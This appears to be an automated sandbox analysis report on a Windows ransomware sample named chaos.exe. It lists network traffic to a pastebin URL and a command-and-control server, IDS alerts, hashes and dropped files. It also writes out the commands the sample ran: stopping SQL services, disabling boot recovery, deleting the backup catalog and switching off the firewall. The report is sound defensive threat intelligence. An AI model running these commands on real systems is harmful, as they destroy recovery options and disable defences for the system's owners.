"pastebin.com"
"www.sfml-dev.org" - source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"148.251.247.174:80"
"104.23.98.190:80"
"80.82.69.109:8080" - source
- Network Traffic
- relevance
- 1/10
-
Contains PDB pathways
- details
-
"D:\yo\chaos\Release\chaos.pdb"
"JkBJBJ<B/SvcWideCharToMultiByte failed for: IsEULA_Accepted...iDisableCheckEULAIsEULA_Accepted Check disabled, returning 1\AdobeViewerEULA not yet acceptedEULAAcceptedForBrowserEULA accepted from 1EULA accepted from 2%s_Classes\VirtualStore\MACHINE\EULA accepted from 3IsVistaOrLater returns 1IsVistaOrLater returns 0IsXP returns 1kernel32.dllntdllRtlGetVersionRtlGetVersion failed, using GetVersionExProgramW6432PROCESSOR_ARCHITECTUREAMD64%d%d%c%dCheckSystemRequirements os,sp = %d %d osString = %s, physicalMemory (%d) = %dCheckSystemRequirements failed. Required MinOS: CheckSystemRequirements failed. Required MaxOS: CheckSystemRequirements failed. Required MinServicePack: CheckSystemRequirements failed. Required MinMemory: EnableLUAUAC is enabledUAC is disabled or not registeredSystem context install not allowed, will not update Std user with UAC offStdUserUacOffupgradeexitstduseruacoffMustElevate...already elevatedrequired to elevatenot required to elevate\Adobe\ARM\1.0\AdobeARM.exeSHGetFolderPath in GetCurrentExePath failed: \Adobe\ARM\1.0\SHGetFolderPath in GetLauncherPath failed: Not found or not valid: GetFileVersion(): File version: %1!u!.%2!u!.%3!u!.%4!u!VerQueryValue() failed in GetFileVersion().GetFileVersionInfo() failed in GetFileVersion().GetFileVersionInfoSize() failed in GetFileVersion().%1!u!.%2!u!.%3!u!.%4!u!IsNewArmAvailable...AdobeARM.exe version is not validIsNewArmAvailable: Major version is newer, returning 1.IsNewArmAvailable: Minor version is newer, returning 1.IsNewArmAvailable: Build number is newer, returning 1.IsNewArmAvailable: Revision number is newer, returning 1.IsNewArmAvailable: ARM version is up to date, returning 0.FindCurrentPDFOwner....pdf.pdf - no value.pdf value: AcroExch.DocumentAcroExch.Document.7\shellAcroExch.Document.7\shell - no valueReadAcroExch.Document.7\shell\Read\commandOpenAcroExch.Document.7\shell\Open\commandAcrobat.Document.\shell\Open\commandAcroExch.Document.\shell\Read\commandUnknown ProgID value in .pdfUnable to get file path "%1"File not found: AcroRd32.exeAcrobat.exeIsPatchingDisabled...Software\Policies\Microsoft\Windows\InstallerDisablePatchDisablePatch is set in HKLM\DisableLUAPatchingDisableLUAPatching is set in HKLM\GetPreferences...SOFTWARE\Policies\Adobe\Acrobat Reader\Adobe Acrobat\\FeatureLockdown.0\FeatureLockdownFeatureLockDown set to disable Updater.Using CommandLine preference AUTO_DOWNLOADAUTO_ALLAUTO_CHECK_UPDATESUsing registered preference AUTO_OFFpreferences not provided with command line and not registered - using default AUTO_DOWNLOADRegisterResult...Empty applicationtLastError_iInstallTime_tLastT_IsTimeElapsed...iDisableLastIsTimeElapsed Check disabled, returning 1Minutes elapsed: IsLongTimeNoUpdates...iIntervalLongTimeNoUpdates check is disabled, returning 0Unable to get base check in IsLongTimeNoUpdates, returning 0Days elapsed: Current time is less than registered timeLast check for updates is not positive: Last check for updates is registered but emptyLast check for updates decryption failedLast check for updates is not registeredRegisterError...IsErrorExpired...iDisableErrorCheckError check disabledRegistered Error data invalidRegistered Error Version invalidRegistered Error data irrelevant - Product Version has changedRegistered Error expiredRegistered Error not expiredRegistered Error time not validLast error is not registeredCanDelayUpdate...update release date cannot be usedupdate release time is newer than current timeno delay limit set, can delaydelay limit not reached, can delaydelay limit reachedRegisterPromptForUpgrade...iLastPromptForUpgradeiPromptForUpgradeIntervaltPromptedUpgradeNameiForcedUpgradeUserNotifiedIsPromptForUpgradeTimeElapsed...iDisablePromptForUpgradeCheck for Upgrade was found disabledUpgrade check forced, skipping last prompt validationiInstallTime_ReaderNew Upgrade is available, will prompt User: iDoNotRemindSkippedIsElapsed...Registered time expiredRegistered time not expiredRegistered time not valid not registeredGetDaysRemaning...Days remaining: iTestDaysRemainingFound and will use Days Remaining registered: iNotifyCountUpdate_Ready_Notify_CountiNotifyRebootCountReboot_Pending_Notify_CountRegisterWaitForFilesInUse: empty applicationTotal wait for the files in use: tTimeWaitedFilesInUse_GetTimeWaitedForFilesInUse: empty applicationvalue is registered but not valid: value is not registered ms available, waited Network isNetwork is notWaitForMsiMutex...WaitMsiMutex is over the limitexiting WaitMsiMutex on Application requestOpenSCManager failed in IsMsiBusy: MSIServerOpenService failed in IsMsiBusy: QueryServiceStatusEx failed in IsMsiBusy: Global\_MSIExecuteRepairInstalledArm...SYSTEM\CurrentControlSet\Control\Session ManagerPendingFileRenameOperationswill not repair, found pending rebootfound installed: successfully reinstalled: failed to reinstall: Service_Not_Allowed_ReasonNot Admin and SYSTEM context update is not allowed - will not use ServiceUAC is off and SYSTEM context update is not allowed - will not use ServiceLast Service failure not expired - Service is not allowediLoggedSvcErrorCodeService_Access_ErrorService error reported: Will not report already reported Service errorNotify service to create ShMOpenSCManager failedAdobeARMserviceOpenService failedQueryServiceStatusEx failedService is stopped or about to stopWaiting for Service to runQueryServiceStatusEx failed Service wait timed outService notify successService Manager reported error: Service success, time elapsed: Service error :*?Global\PdfOnershipInProcessEventpdf ownership takeover in process, will not cleanup ArmUI.ini fileCleanupEx...elevated, will not cleanupValidateSingleInstallFiles...Signature Validation failed for: ValidateSingleInstallFiles returns 0 file size for: ValidateSingleInstallFiles returns TRUE for: SELECT Value FROM Property WHERE Property.Property='%s'MsiViewExecute()MsiGetRecordString()GetCurrentUserSID(): LookupAccountName() failed @1st time call.GetCurrentUserSID():failed to allocate memory for pSid.GetCurrentUserSID():failed to allocate memory for wsDomainName.GetCurrentUserSID():LookupAccountName() failed.GetCurrentUserSID():ConvertSidToStringSid() failed.thsnYaVieBodaEncrypted by Adobe.0123456789ABCDEFEncryption failed.failed to copy command line into SM: command line: ARM update folder: session id: failed to get session id: unable to create SMEmpty Command Line or User NameGetFinalCommandLineForSM...1.701.999.9999unable to determine service version: installed service is legacy version /Svc /USER:cmd line limit reached for legacy service: final cmd line limit is reached: final cmd line for arm next service: \Adobe\ARM\1.0\armsvc.exefound service version: IsAnyProductInFullAuto...{A6EADE66-0000-0000-484E-7E8A45000000};{AC76BA86-0000-0000-7760-7E8A45000000};{AC76BA86-0000-0000-BA7E-7E8A45000000}policy disabled for: eula not accepted for: in found full auto for: in Modefound product in full auto: Comctl32LoadIconMetricServer to set iNotify value in HKEY_CURRENT_USER: Server (RegSetValueEx) failed to set iNotify value in HKEY_CURRENT_USERServer (RegOpenKeyEx) failed to set iNotify value in HKEY_CURRENT_USERIsHighBeamAllowed...allowed version list emptyinstalled version: confirmed allowed versionallowed version not confirmedunable to determine version: missing: Entered WaitForEvent Event signaledEvent timed outEvent wait failedIDS_TOOLTIP_MODE_FILES_IN_USEnot ignorable file is in use, will try to Upgrade laterCannot start Upgrade - not appropriate mode or MSI busyAttemptUpgrade...already processedauto-upgrade not availablewill not attemp upgrade, will attempt upgrade when possible, WaitFilesInUse in progressmode is not MODE_UPGRADES_FOUNDGetAutoUpgradeStatus...returning auto upgrade status: not MODE_UPGRADES_FOUND modeInitAutoUpgradeDaysRemaining... already initializedSetRegKeyDW failed - SetRegKeyDW succeeded - autoupgradeclockstartedProcessOptOutOrRemindMeLater...will not dismiss, will not dismiss - not appropriate modeping: http://armmf.adobe.com/arm-manifests/win/empty version in ping url.txtfailed to get Temp folderping result: JO,CXPathSelectionLanguageNewParserAllowXsltScriptAllowDocumentFunctionHJ?CJCCCC|JCCCC3)6{O>`3)6{O>`3)6{O>`j_@2Q2Q!i_@2Qi_@2QQ!s.OhJ*E*ECCF''*[local-name(.) = '%s']child::*3)6{O>`3)6{O>`Y@H`JJRSDSD|Kq1D:\CB\ARM_Main\BuildResults\bin\Win32\Release\AdobeARM.pdbJIIIJLJJ@IJ I0I@IJLJJ@ IJpIII@IJLJJ@pI0JIII@IJLJ0J@IXJI(I<I@IJLJXJ@IJlI|IIIJ@lIJ@IIIJIIILJJ@ITJ8IHITILJTJ@8IKJJIIILJJ@I JIII J@IK4JTJ@IPI\ILJTJ@@IJIII@IJLJJ@IJIII@IJLJJ@IJ4IDIPILJJ@4IJIIIPILJJ@I,JIIIPILJ,J@IJ I0I8IJ@ IJhIxIIJ@hIKJ,JIIII,J@IPJ@I(IIpJDITI`IIpJ@DIIIIIlIIIJ@|IJ@IIII8IJ@I,II8IJ@TIdI8IJBTI J@III8I J@IJBTI@JIIPIlIIPIIIIlIIIlII@J@IxJ" - source
- File/Memory
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\RasPbFile"
"\Sessions\1\BaseNamedObjects\Global\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7"
"Global\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7"
"RasPbFile" - source
- Created Mutant
- relevance
- 3/10
-
GETs files from a webserver
- details
-
"GET /ip-provider.php HTTP/1.0
content-length: 0
from: user@sfml-dev.org
host: www.sfml-dev.org
user-agent: libsfml-network/2.x"
"GET /raw/eEpt6UrD HTTP/1.0
content-length: 0
from: user@sfml-dev.org
host: pastebin.com
user-agent: libsfml-network/2.x" - source
- Network Traffic
- relevance
- 5/10
-
Opened the service control manager
- details
-
"net1.exe" called "OpenSCManager" requesting access rights "0X0"
"net1.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1) - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1035 (Show technique in the MITRE ATT&CK™ matrix)
-
Overview of unique CLSIDs touched in registry
- details
-
"netsh.exe" touched "Nap Config Read class" (Path: "HKCU\WOW6432NODE\CLSID\{EA4A0A43-1C8F-4C7B-A4B1-28ECBD96BA8C}")
"netsh.exe" touched "Quarantine Agent Management class" (Path: "HKCU\WOW6432NODE\CLSID\{EB082BA1-DF8A-46BE-82F3-35BF9E9BE52F}")
"netsh.exe" touched "HNetCfg.FwMgr" (Path: "HKCR\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}") - source
- Registry Access
- relevance
- 3/10
-
Runs shell commands
- details
-
"%WINDIR%\system32\cmd.exe /c net stop SQLWriter" on 2020-4-12.22:57:36.771
"%WINDIR%\system32\cmd.exe /c net stop SQLBrowser" on 2020-4-12.22:57:37.053
"%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER" on 2020-4-12.22:57:37.350
"%WINDIR%\system32\cmd.exe /c net stop MSSQL$CONTOSO1" on 2020-4-12.22:57:37.693
"%WINDIR%\system32\cmd.exe /c net stop MSDTC" on 2020-4-12.22:57:38.193
"%WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures" on 2020-4-12.22:57:38.568
"%WINDIR%\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no" on 2020-4-12.22:57:38.693
"%WINDIR%\system32\cmd.exe /c wbadmin delete catalog -quiet" on 2020-4-12.22:57:39.068
"%WINDIR%\system32\cmd.exe /c net stop SQLSERVERAGENT" on 2020-4-12.22:57:39.225
"%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER" on 2020-4-12.22:57:39.568
"%WINDIR%\system32\cmd.exe /c net stop vds" on 2020-4-12.22:57:40.146
"%WINDIR%\system32\cmd.exe /c netsh advfirewall set currentprofile state off" on 2020-4-12.22:57:40.475
"%WINDIR%\system32\cmd.exe /c netsh firewall set opmode mode=disable" on 2020-4-12.22:58:21.662 - source
- Monitored Target
- relevance
- 5/10
- ATT&CK ID
- T1059 (Show technique in the MITRE ATT&CK™ matrix)
-
Spawns new processes
- details
-
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLWriter" (Show Process)
Spawned process "net.exe" with commandline "net stop SQLWriter" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLWriter" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLBrowser" (Show Process)
Spawned process "net.exe" with commandline "net stop SQLBrowser" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLBrowser" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER" (Show Process)
Spawned process "net.exe" with commandline "net stop MSSQLSERVER" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQLSERVER" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQL$CONTOSO1" (Show Process)
Spawned process "net.exe" with commandline "net stop MSSQL$CONTOSO1" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQL$CONTOSO1" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSDTC" (Show Process)
Spawned process "net.exe" with commandline "net stop MSDTC" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSDTC" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspo ..." (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} recoveryenab ..." (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c wbadmin delete catalog -quiet" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLSERVERAGENT" (Show Process)
Spawned process "net.exe" with commandline "net stop SQLSERVERAGENT" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Spawns new processes that are not known child processes
- details
-
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLWriter" (Show Process)
Spawned process "net.exe" with commandline "net stop SQLWriter" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLWriter" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLBrowser" (Show Process)
Spawned process "net.exe" with commandline "net stop SQLBrowser" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLBrowser" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER" (Show Process)
Spawned process "net.exe" with commandline "net stop MSSQLSERVER" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQLSERVER" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQL$CONTOSO1" (Show Process)
Spawned process "net.exe" with commandline "net stop MSSQL$CONTOSO1" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQL$CONTOSO1" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSDTC" (Show Process)
Spawned process "net.exe" with commandline "net stop MSDTC" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSDTC" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspo ..." (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} recoveryenab ..." (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c wbadmin delete catalog -quiet" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLSERVERAGENT" (Show Process)
Spawned process "net.exe" with commandline "net stop SQLSERVERAGENT" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
-
"AutoIt3_x64.exe" has type "data"
"603jOLdO.exe" has type "data"
"AUDIOSEARCHMAIN.DLL" has type "data"
"5F7TBCLUxJG.doc" has type "data"
"AcroRd32.exe" has type "data"
"ACEWDAT.DLL" has type "data"
"Adobe AIR Application Installer.swf" has type "data"
"ant-javafx.jar" has type "data"
"AdobeCollabSync.exe" has type "data"
"AXSLE.dll" has type "data"
"AIDE.dll" has type "data"
"3LnBJn.doc" has type "data"
"ACE.dll" has type "data"
"awt.dll" has type "data"
"7zFM.exe" has type "data"
"4RHcGmkB.exe" has type "data"
"ACEDAO.DLL" has type "data"
"AdobeARM.exe" has type "8086 relocatable (Microsoft)"
"ACEES.DLL" has type "data" - source
- Binary File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
-
"chaos.exe" touched file "%WINDIR%\Globalization\Sorting\SortDefault.nls"
"chaos.exe" touched file "%WINDIR%\AppPatch\sysmain.sdb"
"chaos.exe" touched file "%WINDIR%\SysWOW64\cmd.exe"
"chaos.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\3IQVUB7J\index[3].js"
"chaos.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\0CH0OVJV\i[1]"
"chaos.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\4KBMQIHU\5[1].jpg"
"chaos.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\4KBMQIHU\phone[1].js"
"chaos.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\9DCW73ON\featured380[1].jpg"
"chaos.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SLSW3KYW\logo_header@2x[1].png" - source
- API Call
- relevance
- 7/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "www.sfml-dev.org"
Heuristic match: "user@sfml-dev.org"
Heuristic match: "pastebin.com"
Heuristic match: "stevenxx134@gmail.com"
Heuristic match: "steven77xx@mail.ru and Steven77xx@protonmail.com"
Pattern match: "https://i.ibb.co/2PXVhhm/1.png"
Heuristic match: "UJZpGYz0[Fa!(';IUy7$>@niHjcQ+\^}pN5<}1-M4zZ/Wnr]A'(&+Y5`xpJmo0UJwM``.K-?lz^3y:[`o[Dv/\u8+QuD!KW`0QL??Wg}$==|8M[;0u)M+aMlE?>rB$aIi:N.Hr;/fOZ`=CC;}E_'2V77ggo^amF*^`$sZh.+pT.As"
Pattern match: "Bt.npT/phcoruDge+u?%LWwsVjJ`aJv5"
Pattern match: "aU.Ex/yrU$k"
Pattern match: "r.zQ/'1;~|"
Pattern match: "vt-0xB.vNoY/!J{z*jHrH}9\SvQeF1z"
Pattern match: "X4Nq.DKH/TR7s5"
Pattern match: "uH-tH.tH/tH0tH1tH2htH9PtH=@tH"
Pattern match: "www.7-zip.org/U"
Pattern match: "YX.wO/qliH"
Pattern match: "p.EZ/|xMS#7ZO"
Pattern match: "NfNmXrC.JG/Po[gU1/E#m81U`|p5q0J]oEcm\9,Lh%O}jL20^q%:&X\W7U{A"
Heuristic match: "o5~:GmLgyEIvX..DjxuLzLnt.fM"
Heuristic match: "<dT+QQF*Txj1K=m^NG*dIx_HSp5w,1p#-{eo+b4K3pb&L\S(f*pGXd[#`7R@.vE"
Pattern match: "ZkuGa.M7.lbj/V+d90Z&91yb"
Pattern match: "S.OApI/.Mdrc$4.r6/E@w@"
Heuristic match: "Y_^M3H]UjhQdP V3EVWPEdEjPqAjjjp0tnj#h8RMEEE;}EuCEjVPWE\0u3VjMEQPC0}ruk.Md"
Heuristic match: "Y_^[M3<]UjhQdP,V3ESVWPEdu~u_2~rjPj7WtPt=03hPfPD3fjPVSCRjjEP`C3+tftfJuuz3fxHPxTRt7h&ThPUxRjjP`r.Md"
Heuristic match: "Y>I~P*)^~(gI>[O{xgZ3MLKQ$AD=a,`(kWKo[6')l/ZMM#Ce.Dj"
Pattern match: "u.PBQj/PU|Ars\\m2hMHmEQ;}UKJW"
Heuristic match: "c6h<g;p/ax4L7~J,5zt3\A4Yd{m)#R%g`bvL0)^c,!t3Vl5u7|KSzn=cKlf8H~rp6b7q7ERd09fSJGoPFMoa.mg"
Pattern match: "eLX40.EZb/8@T\$Vb9McL.IHA3'mo9-4j.!0"
Pattern match: "t5.Xy/&c~cH0CVy\Ru$4I9"
Pattern match: "armmf.adobe.com/arm-manifests/win/http://www.adobe.com/support/downloads/product.jsp?product=1&platform=Windowshttp://www.adobe.com/support/downloads/product.jsp?product=10&platform=WindowsSOFTWARE\Adobe\Adobe"
Pattern match: "www.adobe.com/go/update_error_winrelaunched"
Pattern match: "get.adobe.com/reader/Auto_Upgrade_Statusupgradeoffered2autoupgradeeligible2IDS_TITLE_GET_UPGRADE_NAMEIDS_TITLE_REASONS_TO_UPGRADEIDS_TITLE_UPGRADE_HIGHLIGHTSIDS_UPGRADE_REASONS_HIGHLIGHTSIDS_UPGRADE_HIGHLIGHTS"
Pattern match: "OverwriteURLs.com/ArmReport.ini[SESSION]Delete_ReportMoveEx_ReportSESSIONJ#ASOFTWARE\Adobe\Adobe"
Pattern match: "www.adobe.com/go/ARMUpgradeFailedHelpUpgrade_WhatsNewopenThe"
Pattern match: "http://armmf.adobe.com/arm-manifests/win/empty" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
System Security
-
Creates or modifies windows services
- details
-
"netsh.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\NAPAGENT\LOCALCONFIG")
"netsh.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\ENROLL\HCSGROUPS")
"netsh.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\NAPAGENT\SHAS")
"netsh.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\NAPAGENT\QECS")
"netsh.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\UI") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Opens the Kernel Security Device Driver (KsecDD) of Windows
- details
- "netsh.exe" opened "\Device\KsecDD"
- source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1215 (Show technique in the MITRE ATT&CK™ matrix)
-
Creates or modifies windows services
-
Unusual Characteristics
-
Matched Compiler/Packer signature
- details
- "0b032586772c4b52ca2712d92f5a13b26051ef72a8bcdd70c98eb9faffa22425.bin" was detected as "VC8 -> Microsoft Corporation"
- source
- Static Parser
- relevance
- 10/10
- ATT&CK ID
- T1045 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads information about supported languages
- details
-
"net.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"net1.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409") - source
- Registry Access
- relevance
- 3/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Matched Compiler/Packer signature
File Details
chaos.exe
- Filename
- chaos.exe
- Size
- 998KiB (1021952 bytes)
- Type
- peexe executable
- Description
- PE32 executable (console) Intel 80386, for MS Windows
- Architecture
- WINDOWS
- SHA256
- 0b032586772c4b52ca2712d92f5a13b26051ef72a8bcdd70c98eb9faffa22425
- MD5
- 9612185e1df89f5b46a74178e882fac2
- SHA1
- 937f671736acd13913bcafb273dcd8fedc833049
- ssdeep
- 24576:0xlevelaNanydr67EEMXml8qmhCFCDTHXk4nRqw:0xQFNyyOgXmlYgsDT3k4nRqw
- imphash
- 3b7bc2e55a92576e073cf2d4e3717fec
- authentihash
- a47b49be5e9c86594e091a34a743defb387dbac727ca030f0a1049fec5b2f71c
- Compiler/Packer
- VC8 -> Microsoft Corporation
- PDB Timestamp
- 04/10/2020 16:43:50 (UTC)
- PDB Pathway
- D:\yo\chaos\Release\chaos.pdb
- PDB GUID
- 5FF75B7ADA7B4D45B775932C6DCA246F
Classification (TrID)
- 61.7% (.EXE) Win64 Executable (generic)
- 14.7% (.DLL) Win32 Dynamic Link Library (generic)
- 10.0% (.EXE) Win32 Executable (generic)
- 4.5% (.EXE) OS/2 Executable (generic)
- 4.4% (.EXE) Generic Win/DOS Executable
File Metadata
- 1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 27031)
- 1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 27031)
- 7 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)
- 51 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 27508)
- 37 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)
- 131 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)
- 25 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 26706)
- File contains Visual Basic code
- File appears to contain raw COFF/OMF content
- File is the product of a small codebase (1 files)
File Sections
Details | ||||||
---|---|---|---|---|---|---|
File Resources
Details | ||||
---|---|---|---|---|
File Imports
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 32 processes in total (System Resource Monitor).
-
chaos.exe
(PID: 3396)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop SQLWriter (PID: 2240)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop SQLBrowser (PID: 528)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER (PID: 2184)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop MSSQL$CONTOSO1 (PID: 3952)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop MSDTC (PID: 3796)
- cmd.exe %WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures (PID: 2936)
- cmd.exe %WINDIR%\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no (PID: 2588)
- cmd.exe %WINDIR%\system32\cmd.exe /c wbadmin delete catalog -quiet (PID: 1972)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop SQLSERVERAGENT (PID: 3180)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER (PID: 4068)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop vds (PID: 2980)
-
cmd.exe
%WINDIR%\system32\cmd.exe /c netsh advfirewall set currentprofile state off
(PID: 1316)
- netsh.exe netsh advfirewall set currentprofile state off (PID: 3940)
-
cmd.exe
%WINDIR%\system32\cmd.exe /c netsh firewall set opmode mode=disable
(PID: 1976)
- netsh.exe netsh firewall set opmode mode=disable (PID: 3476)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
pastebin.com
OSINT |
104.23.98.190
TTL: 2 |
ENOM, INC.
Organization: WHOISGUARD, INC. Name Server: SUE.NS.CLOUDFLARE.COM Creation Date: Tue, 03 Sep 2002 00:00:00 GMT |
United States |
www.sfml-dev.org
OSINT |
148.251.247.174
TTL: 3599 |
united-domains AG
Organization: Limbozz GmbH Name Server: PRI.MORDAC.DE Creation Date: Tue, 26 Feb 2008 15:26:15 GMT |
Germany |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
148.251.247.174 |
80
TCP |
chaos.exe PID: 3396 |
Germany |
104.23.98.190 |
80
TCP |
chaos.exe PID: 3396 |
United States |
80.82.69.109 |
8080
TCP |
chaos.exe PID: 3396 |
Netherlands |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
148.251.247.174:80 | GET | 148.251.247.174/ip-provider.php | GET /ip-provider.php HTTP/1.0
content-length: 0
from: user@sfml-dev.org
host: www.sfml-dev.org
user-agent: libsfml-network/2.x More Details |
104.23.98.190:80 | GET | 104.23.98.190/raw/eEpt6UrD | GET /raw/eEpt6UrD HTTP/1.0
content-length: 0
from: user@sfml-dev.org
host: pastebin.com
user-agent: libsfml-network/2.x More Details |
80.82.69.109:8080 | POST | 80.82.69.109/1614CEEEC50A9336EBF690886CAA747D6811C45D37086A3FA7B11C9E83926C6C | POST /1614CEEEC50A9336EBF690886CAA747D6811C45D37086A3FA7B11C9E83926C6C HTTP/1.1
connection: close
content-length: 1720
content-type: application/x-www-form-urlencoded
from: me
host: 80.82.69.109
user-agent: libsfml-network/2.x More Details |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 104.23.98.190:80 (TCP) | A Network Trojan was detected | ETPRO HUNTING Suspicious Terse HTTP Request to Pastebin | 2811838 |
local -> 148.251.247.174:80 (TCP) | A Network Trojan was detected | ET USER_AGENTS SFML User-Agent (libsfml-network) | 2026914 |
local -> 104.23.98.190:80 (TCP) | A Network Trojan was detected | ET USER_AGENTS SFML User-Agent (libsfml-network) | 2026914 |
local -> 148.251.247.174:80 (TCP) | Device Retrieving External IP Address Detected | ETPRO POLICY External IP Address Lookup via libsfml-network | 2838021 |
local -> 80.82.69.109:8080 (TCP) | A Network Trojan was detected | ET USER_AGENTS SFML User-Agent (libsfml-network) | 2026914 |
local -> 80.82.69.109:8080 (TCP) | Malware Command and Control Activity Detected | ETPRO MALWARE Zeropadypt/Limbo/Ouroboros Ransomware CnC Checkin M4 | 2839873 |
local -> 80.82.69.109:8080 (TCP) | Potentially Bad Traffic | ETPRO INFO HTTP Request with Lowercase connection Header Observed | 2838131 |
Extracted Strings
Extracted Files
Displaying 36 extracted file(s). The remaining 1033 file(s) are available in the full version and XML/JSON reports.
-
Informative 36
-
-
AutoIt3_x64.exe
- Size
- 1MiB (1058355 bytes)
- Type
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
